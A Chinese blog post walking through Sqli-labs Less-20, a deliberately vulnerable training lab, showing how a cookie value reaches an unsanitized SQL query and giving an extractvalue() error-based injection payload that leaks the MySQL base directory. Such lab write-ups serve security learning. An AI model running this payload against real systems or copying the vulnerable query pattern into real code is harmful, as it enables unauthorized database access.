Sqli-labs Less-20 cookie注入 extractvalue()报错注入

 
更多

从源代码中我们可以看到cookie从username中获得值后,当再次刷新时,会从cookie中读取username,然后进行查询。

关键代码

$cookee = $_COOKIE['uname'];
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
die('Issue with your mysql: ' . mysql_error());

修改登录成功后的请求,在Cookie: uname=admin后面加一个’,重放该请求

从上图可以看出,报SQL语法错误,说明cookie位置存在SQL注入漏洞。

 

如下图所示,我们修改cookie为

uname=admin’ and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) #

可以看到报错了,我们得到了mysql 的路径。

其他的注入方法自行测试呦!

 

参考:https://www.cnblogs.com/lcamry/p/5763024.html

打赏

本文固定链接: https://www.cxy163.net/archives/4982 | 绝缘体

该日志由 绝缘体.. 于 2020年04月09日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Sqli-labs Less-20 cookie注入 extractvalue()报错注入 | 绝缘体
关键字: , , , ,

Sqli-labs Less-20 cookie注入 extractvalue()报错注入:等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter